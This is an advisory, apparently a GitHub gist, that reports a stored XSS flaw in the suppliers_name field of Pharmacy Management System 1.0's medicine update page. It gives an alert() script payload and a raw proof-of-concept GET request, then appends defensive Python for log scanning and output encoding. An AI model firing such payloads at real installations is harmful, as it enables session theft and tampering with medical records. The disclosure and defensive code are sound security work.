
@higordiego
Created October 19, 2024 16:08

Stored XSS Vulnerability in Pharmacy Management System – Medicine Update


Affected Version:

  • Pharmacy Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: Stored Cross-Site Scripting (XSS)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable URL:

  • /php/manage_medicine.php?action=update&id=2&name=Crosin&packing=1&generic_name=Aaaaa32131&suppliers_name=aaa

Vulnerability Description:

A stored XSS vulnerability has been identified in the Pharmacy Management System version 1.0, specifically within the medicine update functionality. This vulnerability arises due to the absence of proper input sanitization in the suppliers_name parameter. An attacker can inject malicious JavaScript code, which will be stored persistently in the database and executed every time the medicine record is accessed.

Since the payload is executed whenever an administrator or user views or interacts with the affected page, this vulnerability can result in severe consequences, including:

  • Session hijacking
  • Theft of sensitive data (e.g., cookies, session tokens)
  • Privilege escalation (e.g., gaining unauthorized access)
  • UI defacement or manipulation (leading to phishing attacks)

This persistent XSS attack can cause long-term damage by enabling attackers to alter page behavior, steal credentials, and manipulate critical pharmaceutical records.


Proof of Concept (PoC):

Below is a sample malicious payload injected into the suppliers_name parameter:

<script>alert('XSS');</script>

Once injected, the payload is stored in the system’s database. Each time the page displaying the medicine details is accessed, the script will trigger an alert, demonstrating the XSS. However, a more advanced attacker could use this technique to redirect users, exfiltrate sensitive data, or steal sessions.


PoC Request:

GET /php/manage_medicine.php?action=update&id=2&name=Crosin&packing=1&generic_name=Aaaaa32131&suppliers_name=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

After executing the above request, the malicious JavaScript will be embedded in the suppliers_name field. Any subsequent access to the affected page will trigger the XSS payload, showcasing the vulnerability.
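As an added example (not part of the original gist), the following Python shows two things a defender would want from this report: a check over web server access logs for the update request pattern in the PoC above, decoding the query string so the suppliers_name payload is inspected in its final form, and the output encoding that neutralises such a stored value when the medicine record is rendered. The log lines are constructed; the watched parameter names are taken from the vulnerable URL.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not from the advisory). Line 1 reproduces the
# PoC request; line 2 is a normal update; line 3 holds a legitimate ampersand.
SAMPLE_LOG = """\
127.0.0.1 - - [19/Oct/2024:16:08:01 +0000] "GET /php/manage_medicine.php?action=update&id=2&name=Crosin&packing=1&generic_name=Aaaaa32131&suppliers_name=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1" 200 512
127.0.0.1 - - [19/Oct/2024:16:09:13 +0000] "GET /php/manage_medicine.php?action=update&id=3&name=Aspirin&packing=10&generic_name=ASA&suppliers_name=Acme%20Pharma HTTP/1.1" 200 480
127.0.0.1 - - [19/Oct/2024:16:10:44 +0000] "GET /php/manage_medicine.php?action=update&id=4&name=Zinc&packing=1&generic_name=Zn&suppliers_name=Smith%20%26%20Sons HTTP/1.1" 200 480
"""

# Free-text parameters of the update endpoint named in the advisory.
WATCHED_PARAMS = ("suppliers_name", "name", "generic_name", "packing")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")  # an HTML tag opener after decoding


def decode_query(path: str) -> dict[str, str]:
    """Parse the query string, percent-decoding a bounded number of extra
    rounds so double-encoded markup is inspected in its final form."""
    params = {}
    for key, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        value = values[0]
        for _ in range(3):
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        params[key] = value
    return params


def find_markup(log_text: str) -> list[tuple[int, str, str]]:
    """Return (line number, parameter, decoded value) for every watched
    parameter whose value contains an HTML tag opener."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for key, value in decode_query(match.group(1)).items():
            if key in WATCHED_PARAMS and TAG_RE.search(value):
                hits.append((lineno, key, value))
    return hits


def render_text(value: str) -> str:
    """Output encoding for an HTML text node: the stored value stays intact
    and is neutralised at render time, so <, >, quotes and & cannot open a tag."""
    return html.escape(value, quote=True)
```

Running `find_markup(SAMPLE_LOG)` flags only the first line; "Smith & Sons" on the third line is not reported but is still encoded to `Smith &amp; Sons` by `render_text`.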


XSS Example:

Screenshots (not reproduced here): Stored XSS Example; Stored XSS Triggered

External Links:

